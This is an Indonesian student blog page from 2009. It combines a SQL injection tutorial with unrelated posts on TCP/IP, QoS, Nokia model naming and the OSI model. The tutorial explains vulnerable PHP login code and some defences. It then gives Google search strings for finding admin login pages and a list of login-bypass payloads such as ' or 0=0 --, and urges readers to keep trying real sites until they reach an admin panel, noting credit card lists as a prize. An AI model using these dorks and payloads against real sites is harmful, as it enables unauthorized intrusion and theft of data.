Pengertian SQL Injection
1) SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi client.
2) SQL Injection merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.
Sebab terjadinya SQL Injection
1) Tidak adanya penanganan terhadap karakter – karakter tanda petik satu ’ dan juga karakter double minus -- yang menyebabkan suatu aplikasi dapat disisipi dengan perintah SQL.
2) Sehingga seorang Hacker menyisipkan perintah SQL kedalam suatu parameter maupun suatu form.
Bug SQL Injection berbahaya ?
1) Teknik ini memungkinkan seseorang dapat login kedalam sistem tanpa harus memiliki account.
2) Selain itu SQL injection juga memungkinkan seseorang merubah, menghapus, maupun menambahkan data–data yang berada didalam database.
3) Bahkan yang lebih berbahaya lagi yaitu mematikan database itu sendiri, sehingga tidak bisa memberi layanan kepada web server.
Apa saja yang diperlukan untuk melakukan SQL Injection ?
1) Internet Exploler / Browser
2) PC yang terhubung internet
3) Program atau software seperti softice
Contoh sintaks SQL Injection
Contoh sintak SQL dalam PHP
1) $SQL = “select * from login where username =’$username’ and password = ‘$password’”; , {dari GET atau POST variable }
2) isikan password dengan string ’ or ’’ = ’
3) hasilnya maka SQL akan seperti ini = “select * from login where username = ’$username’ and password=’pass’ or ‘=′”; , { dengan SQL ini hasil selection akan selalu TRUE }
4) maka kita bisa inject sintax SQL (dalam hal ini OR) kedalam SQL
Gambar contoh SQL Injection
Contoh sintaks SQL Injection
1) Sintaks SQL string ‘-- setelah nama username
2) Query database awal :
Berubah menjadi :
Contoh sintaks SQL Injection
SQL Injection melalui URL, contohnya :
Penanganan SQL Injection
1) Merubah script php
2) Menggunakan MySQL_escape_string
3) Pemfilteran karakter ‘ dengan memodifikasi php.ini
1. Merubah script php
Contoh script php semula :
$query = "select id,name,email,password,type,block from user " .
"where email = '$Email' and password = '$Password'";
$hasil = mySQL_query($query, $id_mySQL);
while($row = mySQL_fetch_row($hasil))
{
$Id = $row[0];
$name = $row[1];
$email = $row[2];
$password = $row[3];
$type = $row[4];
$block = $row[5];
}
if(strcmp($block, 'yes') == 0)
{
echo "\n";
exit();
}
else if(!empty($Id) && !empty($name) && !empty($email) && !empty($password));
Script diatas memungkinkan seseorang dapat login dengan menyisipkan perintah SQL kedalam form login. Ketika hacker menyisipkan karakter ’ or ’’ = ’ kedalam form email dan password maka akan terbentuk query sebagai berikut :
Maka dilakukan perubahan script menjadi :
$query = "select id,name,email,password,type,block from user".
"where email = '$Email'";
$hasil = mySQL_query($query, $id_mySQL);
while($row = mySQL_fetch_row($hasil))
{
$Id = $row[0];
$name = $row[1];
$email = $row[2];
$password = $row[3];
$type = $row[4];
$block = $row[5];
}
if(strcmp($block, 'yes') == 0)
{
echo "\n";
exit();
}
$pass = md5($Password);
else if((strcmp($Email,$email) == 0) && strcmp($pass,$password) == 0));
2. Menggunakan MySQL_escape_string
Merubah string yang mengandung karakter ‘ menjadi \’ misal SQL injec’tion menjadi SQL injec\’tion
Contoh : $kar = “SQL injec’tion”;
$filter = mySQL_escape_string($kar);
echo”Hasil filter : $filter”;
Hasilnya :
3. Pemfilteran karakter ‘ dengan memodifikasi php.ini
Modifikasi dilakukan dengan mengenablekan variabel magic_quotes pada php.ini sehingga menyebabkan string maupun karakter ‘ diubah menjadi \’ secara otomatis oleh php
Contoh :
Contoh script yang membatasi karakter yang bisa masukkan :
function validatepassword( input )
good_password_chars =
"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
validatepassword = true
for i = 1 to len( input )
c = mid( input, i, 1 )
if ( InStr( good_password_chars, c ) = 0 ) then
validatepassword = false
exit function
end if
next
end function
Implementasi SQL Injection
1) Masuk ke google atau browse yg lain
2) Masukkan salah satu keyword berikut
"/admin.asp"
"/login.asp"
"/logon.asp"
"/adminlogin.asp"
"/adminlogon.asp"
"/admin_login.asp"
"/admin_logon.asp"
"/admin/admin.asp"
"/admin/login.asp"
"/admin/logon.asp"
{anda bisa menambahi sendiri sesuai keinginan anda}
3) Bukalah salah satu link yang ditemukan oleh google, kemungkinan Anda akan menjumpai sebuah halaman login (user name danpassword).
4) Masukkan kode berikut :
User name : ` or `a'='a
Password : ` or `a'='a (termasuk tanda petiknya)
5) Jika berhasil, kemungkinan Anda akan masuk ke admin panel, di mana Anda bisa menambahkan berita, mengedit user yang lain, merubah about,
dan lain-lain. Jika beruntung Anda bisa mendapatkan daftar kredit card yang banyak.
6) Jika tidak berhasil, cobalah mencari link yang lain yang ditemukan oleh google.
7) Banyak variasi kode yang mungkin, antara lain :
User name : admin
Password : ` or `a'='a
atau bisa dimasukkan ke dua–duanya misal :
‘ or 0=0 -- ; “ or 0=0 -- ; or 0=0 -- ; ‘ or 0=0 # ;
“ or 0=0 # ; ‘ or’x’=’x ; “ or “x”=”x ; ‘) or (‘x’=’x
8) Cobalah sampai berhasil hingga anda bisa masuk ke admin panel
Cara pencegahan SQL INJECTION
1) Batasi panjang input box (jika memungkinkan), dengan
cara membatasinya di kode program, jadi si cracker pemula akan bingung sejenak melihat input box nya gak bisa diinject dengan perintah yang panjang.
2) Filter input yang dimasukkan oleh user, terutama penggunaan tanda kutip tunggal (Input Validation).
3) Matikan atau sembunyikan pesan-pesan error yang keluar dari SQL Server yang berjalan.
4) Matikan fasilitas-fasilitas standar seperti Stored Procedures, Extended Stored Procedures jika memungkinkan.
5) Ubah "Startup and run SQL Server" menggunakan low privilege user di SQL Server Security tab.
Hacking adalah seni. Hacking adalah perpaduan dari pengetahuan, kreatifitas dan kesabaran. Jika Anda memiliki ketiga-tiganya Anda akan berhasil.
R E F E R E N S I
1) -------------, SQLinjection, (www.BlackAngels.it).
2) -------------, Advanced SQL injection in SQL server applications, (www.ngssoftware.com).
3) -------------, SQL injection walktrough (www.securiteam.com).
4) BM-100, ”Hacking hiltonjakarta.com (SQL Injection)”, 24 Juli 2005, (http://www.jasakom.com).
5) Budi Raharjo, ”Keamanan Sistem Informasi Berbasis Internet”, PT Insan Indonesia & PT INDOCISC, Jakarta,2002.
Selasa, 09 Juni 2009
TUTORIAL SQL INJECTION
Minggu, 05 April 2009
Senin, 02 Maret 2009
TCP/IP
Transmission Control Protocol/Internet Protocol (TCP/IP) adalah satu set aturan standar komunikasi data yang digunakan dalam proses transfer data dari satu komputer ke komputer lain di jaringan komputer tanpa melihat perbedaan jenis hardware. Protokol TCP/IP dikembangkan dalam riset pertama kali oleh Defense Advanced Research Projects Agency (DARPA) di Amerika Serikat dan paling banyak digunakan saat ini yang implementasinya dalam bentuk perangkat lunak (software) di system operasi. Protokol TCP/IP dikembangkan dalam riset pertama kali oleh Defense Advanced Research Projects Agency (DARPA) di Amerika Serikat dan paling banyak digunakan saat ini yang implementasinya dalam bentuk perangkat lunak (software) di system operasi. 1. Network Access Layer Bertanggung jawab mengirim dan menerima data dari dan ke media fisik. Tiap protokol pada layer ini harus mampu menerjemahkan sinyal listrik menjadi data digital yang dimengerti komputer, ethernet, token ring, dan dial-up modem yang berjalan di atas Public Switched Telephone Network (PSTN), Integrated Services Digitel Network (ISDN), serta Asynchronus Transfer Mode (ATM). 2. Internet Layer Bertanggungjawab dalam proses pengiriman paket ke alamat yang tepat. 3. Host to Host Layer Bertanggung jawab untuk mengadakan komunikasi antara dua host/komputer. 4. Application Layer Bertanggung jawab untuk menampilkan semua aplikasi yang menggunakan protocol TCP/IP. Sebagai contoh adalah Hypertext Transfer Protocol (HTTP), File Transfer Protocol (FTP), dan Telnet. Berikut ini perbandingan referensi lapisan-lapisan layer model Open Sistem Interconnection (OSI) dengan layer model sistem operasi Linux yang digunakan di penelitian ini: Protokol TCP dan UDP Protokol TCP/IP memiliki standar segmen yang didefinisikan dalam beberapa bagian Berikut: Sequence Number 32 bit angka yang digunakan untuk memastikan urutan yang benar dari data yang datang. Acknowledgment Number 4 bit untuk menandakan koneksi yang berhasil. Data Offset 32 bit indikasi data pertama. Reserved 6 bit diset 0. Control Bit 6 bit untuk URG, ACK, PSH, RST, SYN, FIN. Window 16 bit angka dari oktet yang diterima oleh pengirim. Checksum 16 bit checksum yang telah dikalkulasi dari Field header dan data. Urgent Pointer 16 bit mengindikasikan akhir dari data yang penting. Option variable bit maximum TCP segment size. Padding variable bit memenuhi panjang header merupakan kelipatan 32 bit. Data data dari protokol lapis atas. TCP dan UDP menggunakan nomor port (atau soket) untuk melewatkan informasi ke lapis yang lebih atas. Nomor port digunakan untuk membedakan aplikasi yang berbeda yang melewati jaringan pada saat yang bersamaan. Pengembang software aplikasi telah sepakat untuk menggunakan nomor-nomor port yang didefinisikan dalam RFC 1700 dan RFC 3232. Suatu komunikasi yang tidak melibatkan suatu aplikasi dengan nomor port yang sudah dikenal, akan diberikan nomor-nomor port yang diambil secara random dari suatu rentang tertentu. Nomor-nomor port ini digunakan sebagai alamat sumber dan tujuan dalam segmen TCP. Sesuai dengan RFC 2990 dan rekomendasi ITU E.800 pada tahun 1994 memberikan definisi QoS sebagai suatu kumpulan dari pengaruh performansi layanan yang menentukan tingkat kepuasan dari user terhadap suatu layanan. Sesuai dengan tujuan QoS, administrator dapat memberikan prioritas trafik tertentu. Suatu jaringan, mungkin saja terdiri dari satu atau beberapa teknologi data link layer yang mampu diimplementasikan QoS sesuai karakteristik teknologinya, misalnya: Frame Relay, Ethernet, Token Ring, Point-to-Point Protocol (PPP). Sebuah jaringan dengan QoS-enabled dapat dibuat dengan beberapa teknologi yang berbeda. Teknologi tersebut juga dibangun pada model QoS yang berbeda. Sebuah model QoS terdiri dari beberapa aspek berikut ini: a. Scope menetapkan jarak logic dimana sebuah model layanan disediakan. b. Granularity menetapkan satuan terkecil yang diperlakukan oleh sebuah model layanan. c. Time scale menetapkan sifat granularity dalam satuan waktu dimana sebuah model layanan disediakan. d. Control model menetapkan entity yang mengambil kontrol terhadap jaringan dan bagaimana cara melakukannya. Sebagai contoh adalah kontrol yang dapat dilakukan pada jaringan atau end-system. Sedangkan salah satu model QoS yang dapat diaplikasikan adalah packet scheduling atau disiplin antrian atau penjadwalan paket. Karakteristik QoS Banyak aplikasi yang tidak begitu sensitif terhadap network congestion. Sebagai contoh File Transfer Protocol (FTP) memiliki toleransi yang besar untuk network delay dan terbatasnya bandwidth. Berbeda dengan aplikasi-aplikasi baru seperti audio dan video yang pada umumnya sensitif terhadap delay, dalam hal ini QoS dapat digunakan untuk menyediakan jaminan layanan untuk aplikasi-aplikasi tersebut. 1. Bandwidth merupakan rate transfer data maksimal yang dapat diteruskan antara dua titik. Bandwidth yang dibutuhkan untuk aplikasi suara dipengaruhi oleh algoritma kompresi yang digunakan. Sebagai contoh, header kompresi Real Time Protocol (RTP) dan teknik deteksi aktifitas dapat digunakan untuk mengurangi bandwidth yang digunakan oleh panggilan suara dalam jangkauan 11.2 kbps sampai 50 kbps. Aplikasi video membutuhkan koneksi bandwidth yang lebih tinggi dari 20 sampai 64 Kbps untuk kualitas dan resolusi rendah, sebesar 386 Kbps atau lebih untuk kualitas menengah dan sampai 15 mbps untuk kualitas broadcast. 2. Delay merupakan waktu yang dibutuhkan oleh data untuk menempuh jarak dari asal ke tujuan. Delay dari pengirim ke penerima pada dasarnya tersusun atas hardware latency, delay akses, dan delay transmisi. Delay yang paling sering dialami oleh trafik yang lewat adalah delay transmisi. Dalam rekomendasi G.114 International Telecommunication Union (ITU) telah menspesifikasikan sebuah jangkuan 0-150 milidetik sebagai delay jaringan yang dapat diterima untuk aplikasi suara. 3. Delay Variation merupakan variasi delay end-to-end paket-paket yang diterima. Dimana pengiriman paket dilakukan secara continuous stream. 4. Losses, dimana kemungkinan hilangnya paket saat proses pengiriman. Dua aplikasi yang sensitif terhadap loss adalah voice dan high definition video. Tabel berikut ini mengilustrasikan hubungan Delay Variation dan loss sesuai tingkat kualitas.
Selasa, 24 Februari 2009
Nokia Menamai Produknya
Nokia adalah Brand ternama untuk gadget handphone di Indonesia. Anda juga mungkin memiliki handphone bermerek Nokia. Tapi tahukah anda bagaimana hanphone-handphone tersebut diberi nama? Tahukah anda kenapa ponsel anda bernama N-gage, kenapa type ponsel anda diawali angka 6 dan type ponsel teman anda diawali dengan angka 7?
Berikut Penjelasannya:
1. 1000 Ultrabasic
Semua hp nokia yang diawali dengan angka 1 atau dalam orde 1000 dst. Type ini adalah type nokia yang paling murah yang semula di luncurkan untuk menguasai pasar. Seri ini sudah dapat degunakan untuk telepon dan sms dengan cukup baik. Ponsel Nokia seri ini kurang mendapat sentuhan teknologi high-end.
2. 2000
Basic Ponsel atau Handphone Nokia seri 2000 atau yang diawali dengan angka 2 adalah type hp nokia yang juga masih dalam kategori murah. Bedanya dengan seri 1000, ponsel seri ini sudah tersentuh teknologi high-end seperti bluetooth dan kamera.
3. 3000
Expression Seri 3000 adalah seri murah yang ditampilkan secara kreatif oleh Nokia. Dengan layar warna dan kemampuan mengambil gamba, memainkan musik dan sudah mempunyai konektifitas dengan Komputer (PC)
4. 4000
Untuk alasan tertentu, tidak ada Handphone Nokia yang diawali dengan angka 4. Kenapa?
5. 5000 Active Seri 5000 atau handphone
Nokia yang diawali dengan angka 5 adalah ponsel yang ditujukan untuk mereka yang aktif. Produk dibawah bendera seri ini biasanya didesain untuk menemani anda yang sedang jogging atau untuk menaungi seri handphone nokia yang “musik abisss”
6. 6000
Classic Business Seri ini sudah mulai menyentuh daerah Bisnis. Walaupun masih basic, seri hp ini sudah dilengkapi dengan sentuhan teknologi high-end. Seri 6000 seperti mulai kehilangan ke-niche-an karena banyaknya hp nokia dengan kepala 6 yang diluncurkan.
7. 7000 Experimental
Kata yang paling tepat untuk menggambarkan seri ini adalah “kelinci percobaan” jadi, jangan heran kalau hp nokia dengan huruf depan 7 memiliki banyak kejanggalan disana-sini
8. 8000 Premium
Seri 8000 ini sudah premium, bukan pertamax, apalagi solar. Maksudnya, ya mulai tidak murah lagi gitu loh..
9. 9000 Communicator
Seri ini booming sekitar tahun 2005. Waktu itu seri komunikator merupakan seri yang keren dan menjadi lambang kekayaan. Seri 9000 adalah cikal bakan munculnya E-series (dibawah). Seri ini menggunakan OS GEOS, bukan Symbian.
10. E-Series huruf E menyatakan kata Enterprise.
Berorientasi bisnis, dengan desain yang minimalis, fitur yang lengkap, dan sangat responsif.
11. N-Series -
Pada N series ini, nokia berusaha memasukkan semua hal ke dalam gadget berupa handphone. Handphone Dengan nama awal N adalah HP impian yang pada zaman dahulu cuma ada di film fiksi ilmiah. Pada seri ini daya tahan Baterei juga sangat baik untuk seukuran fitur yang dijalankan.
sumber http://ixone.wordpress.com/2009/02/23/beginilah-cara-nokia-menamai-produk-produk-serinya/
OSI 7 Layer
Pengantar Model Open Systems Interconnection(OSI)
Model Open Systems Interconnection (OSI) diciptakan oleh International Organization for Standardization (ISO) yang menyediakan kerangka logika terstruktur bagaimana proses komunikasi data berinteraksi melalui jaringan. Standard ini dikembangkan untuk industri komputer agar komputer dapat berkomunikasi pada jaringan yang berbeda secara efisien.
Terdapat 7 layer pada model OSI. Setiap layer bertanggungjawwab secara khusus pada proses komunikasi data. Misal, satu layer bertanggungjawab untuk membentuk koneksi antar perangkat, sementara layer lainnya bertanggungjawab untuk mengoreksi terjadinya “error” selama proses transfer data berlangsung.
Model Layer OSI dibagi dalam dua group: “upper layer” dan “lower layer”. “Upper layer” fokus pada applikasi pengguna dan bagaimana file direpresentasikan di komputer. Untuk Network Engineer, bagian utama yang menjadi perhatiannya adalah pada “lower layer”. Lower layer adalah intisari komunikasi data melalui jaringan aktual.
Modularity
“Modularity” mengacu pada pertukaran protokol di level tertentu tanpa mempengaruhi atau merusak hubungan atau fungsi dari level lainnya.
Dalam sebuah layer, protokol saling dipertukarkan, dan memungkinkan komunikasi terus berlangsung. Pertukaran ini berlangsung didasarkan pada perangkat keras “hardware” dari vendor yang berbeda dan bermacam-macam alasan atau keinginan yang berbeda.
7 Layer OSI
Model OSI terdiri dari 7 layer :
* Application
* Presentation
* Session
* Transport
* Network
* Data Link
* Physical
Apa yang dilakukan oleh 7 layer OSI ?
Ketika data ditransfer melalui jaringan, sebelumnya data tersebut harus melewati ke-tujuh layer dari satu terminal, mulai dari layer aplikasi sampai physical layer, kemudian di sisi penerima, data tersebut melewati layer physical sampai aplikasi. Pada saat data melewati satu layer dari sisi pengirim, maka akan ditambahkan satu “header” sedangkan pada sisi penerima “header” dicopot sesuai dengan layernya.
Model OSI
Tujuan utama penggunaan model OSI adalah untuk membantu desainer jaringan memahami fungsi dari tiap-tiap layer yang berhubungan dengan aliran komunikasi data. Termasuk jenis-jenis protoklol jaringan dan metode transmisi.
Model dibagi menjadi 7 layer, dengan karakteristik dan fungsinya masing-masing. Tiap layer harus dapat berkomunikasi dengan layer di atasnya maupun dibawahnya secara langsung melalui serentetan protokol dan standard.
Application Layer: Menyediakan jasa untuk aplikasi pengguna. Layer ini bertanggungjawab atas pertukaran informasi antara program komputer, seperti program e-mail, dan service lain yang jalan di jaringan, seperti server printer atau aplikasi komputer lainnya.
Presentation Layer: Bertanggung jawab bagaimana data dikonversi dan diformat untuk transfer data. Contoh konversi format text ASCII untuk dokumen, .gif dan JPG untuk gambar. Layer ini membentuk kode konversi, translasi data, enkripsi dan konversi.
Session Layer: Menentukan bagaimana dua terminal menjaga, memelihara dan mengatur koneksi,- bagaimana mereka saling berhubungan satu sama lain. Koneksi di layer ini disebut “session”.
Transport Layer: Bertanggung jawab membagi data menjadi segmen, menjaga koneksi logika “end-to-end” antar terminal, dan menyediakan penanganan error (error handling).
Network Layer: Bertanggung jawab menentukan alamat jaringan, menentukan rute yang harus diambil selama perjalanan, dan menjaga antrian trafik di jaringan. Data pada layer ini berbentuk paket.
Data Link Layer: Menyediakan link untuk data, memaketkannya menjadi frame yang berhubungan dengan “hardware” kemudian diangkut melalui media. komunikasinya dengan kartu jaringan, mengatur komunikasi layer physical antara sistem koneksi dan penanganan error.
Physical Layer: Bertanggung jawab atas proses data menjadi bit dan mentransfernya melalui media, seperti kabel, dan menjaga koneksi fisik antar sistem.
Selasa, 17 Februari 2009
Asik Punya Blog......
Punya Bloggggg........
hmmm...
ini blog ada karena tugas...
berharap bisa jadi blog yg keren..
hwahwa...
udah dolo achh...
tar lagi...
Tunggu ajah Fitur2 keren dr Blog saia...
hwahwhaw.....
